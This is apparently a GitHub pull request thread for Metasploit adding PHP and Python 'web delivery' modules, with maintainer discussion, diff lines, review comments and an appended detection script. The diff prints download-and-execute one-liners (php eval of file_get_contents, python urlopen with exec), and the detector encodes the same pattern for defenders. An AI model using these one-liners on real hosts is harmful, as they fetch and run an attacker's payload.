Addition of php web delivery and python web delivery #3018

Closed
wants to merge 11 commits into
from

Contributor

jakxx commented Feb 21, 2014

Module stands up a web server and serves a payload much like psh_web_delivery. This PR adds support for both PHP and Python.

Contributor

jakxx commented Feb 21, 2014

Not sure what to do about disclosure date in this case. First PR to msf so go easy on me :)

Contributor

zeroSteiner commented Feb 21, 2014

@Meatballs1 Do you think it would be beneficial to combine these with your psh_web_delivery module into one like multi/misc/script_web_delivery? It looks like it could be accomplished by adding additional targets.

Contributor

jakxx commented Feb 21, 2014

Yea, I thought about that as well. Didn't know if it would be better to keep them separate or try combining them.

Contributor

Meatballs1 commented Feb 21, 2014

@nullbind has done something similar. But I was thinking that maybe payloads should contain the logic for download+eval similar to your arch_cmd changes @zeroSteiner. Potentially they could do some kind of arch_cmd_web?? Or maybe this should be implemented as a stager for each respective arch?

Powershell is currently a special case as it is more like an encoder than a payload (we choose a native payload). But it hasn't been formalised as either of these yet.

It's definitely useful to have a handy delivery mechanism like this, just need some thought about how best we can implement it to make it flexible. I was surprised how much and how differently the psh_web_delivery could be used but also want to be able to slot that style into psh cmd exploits where space is limited or badchars mean it has to be b64 enc etc.

Contributor

jakxx commented Feb 24, 2014

@Meatballs1 I like the idea of integrating it into payloads. At the same time, the current architecture just makes it so flexible. Excellent for scenarios where MSF was not used to gain initial command exec.

Contributor

wchen-r7 commented Feb 25, 2014

IMO they look like payloads+handlers. I'm not sure if they should be considered as exploits.

Contributor

jakxx commented Feb 26, 2014

I am good with however you guys want to implement them. Just let me know what I need to do.

Contributor

jakxx commented May 15, 2014

@wchen-r7 @Meatballs1 Any more thoughts on this?? I am kinda leaning towards @zeroSteiner's idea of a multi/misc/script_web_delivery.

Contributor

Meatballs1 commented May 15, 2014

Here is @nullbind's example: https://github.com/pwnwiki/q/blob/master/modules/exploits/netspi/ps_webshells.rb
Which is along the lines of a script_web_delivery.

I think people would find it useful, I'm surprised at the number of ways people have used psh_web_delivery.

Contributor

jakxx commented May 29, 2014

@Meatballs1 Awesome. I am close to having a new PR ready. Should I incorporate the powershell option or leave that as a standalone module?

Contributor

Meatballs1 commented May 29, 2014

I don't see a reason to keep it standalone if it reduces the amount of duplicate code

todb-r7 added the module label May 30, 2014

jakxx referenced this pull request Jun 4, 2014

Merged

Script web delivery #3419

Contributor

jakxx commented Jun 20, 2014

Closing for updated PR #3419

jakxx closed this Jun 20, 2014

+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
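Review bot: In both print_line calls, `url` is interpolated unescaped into a single-quoted PHP string that itself sits inside an escaped double-quoted shell argument, so a URI containing a quote character would print a command that does not parse. Validate or escape the value returned by get_uri() before interpolating it, and build the command string once in a local variable so the two printed lines cannot drift apart.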

mwulftange Jun 21, 2014

Contributor

Generally, you don’t need .exe when calling a proper executable in Windows shell. So the first would suffice for both systems.

+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
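Review bot: The command printed by both print_line calls imports urllib2, which exists only in Python 2, and nothing in the printed text or the visible lines states that assumption. Document the interpreter version the module expects in the status message or the module description, so an ImportError on a Python 3 host is not mistaken for a server-side problem.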

mwulftange Jun 21, 2014

Contributor

Same as above.
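
A defender-side check for the command shape these modules print (an interpreter started with inline code that fetches a URL and evaluates the response), as an added example that is not part of this PR or of Metasploit. The function names, rule table and sample command lines are constructed for illustration, and the Python rule also covers `urllib.request`, which the PR itself does not use.

```python
import re

# Per interpreter: inline-code flag, remote-fetch primitive, dynamic-execution primitive.
RULES = {
    "php":    ("-r", r"file_get_contents\s*\(", r"\beval\s*\("),
    "python": ("-c", r"urllib2?\b.*?urlopen\s*\(", r"\bexec\b"),
}
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def _inline_code(name, flag, cmdline):
    """Return the code passed to `name flag ...`, or None if that form is absent."""
    pat = (r"""(?i)(?:^|[\\/\s"'])""" + name +            # bare name or end of a path
           r"""[\d.]*(?:\.exe)?["']?\s+(?:\S+\s+)*?""" +  # python2.7, php.exe, other options
           re.escape(flag) + r"""\s+(.+)$""")
    m = re.search(pat, cmdline)
    return m.group(1) if m else None


def classify(cmdline):
    """Return (interpreter, url) when inline code both fetches a URL and executes it."""
    for name, (flag, fetch, run) in RULES.items():
        code = _inline_code(name, flag, cmdline)
        if code is None:
            continue
        url = URL.search(code)
        if url and re.search(fetch, code, re.I) and re.search(run, code, re.I):
            return name, url.group(0)
    return None


# Constructed process command lines (hosts and paths are made up for this example).
SAMPLES = [
    'php -r "eval(file_get_contents(\'http://delivery.example.test:8080/a1\'));"',
    'C:\\php\\php.exe -r "eval(file_get_contents(\'http://delivery.example.test:8080/a1\'));"',
    'python -c "import urllib2; r = urllib2.urlopen(\'http://delivery.example.test:8080/b2\'); exec(r.read());"',
    'python3 -c "import json,sys; print(json.load(sys.stdin))"',
    'php -r "echo file_get_contents(\'/etc/hostname\');"',
    '/usr/bin/python2.7 /opt/app/fetch.py --url http://updates.example.test/feed',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), "<-", s)
```

Requiring the fetch and the execution primitive together in the same inline code keeps ordinary `-r`/`-c` one-liners and script invocations with URL arguments from matching.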
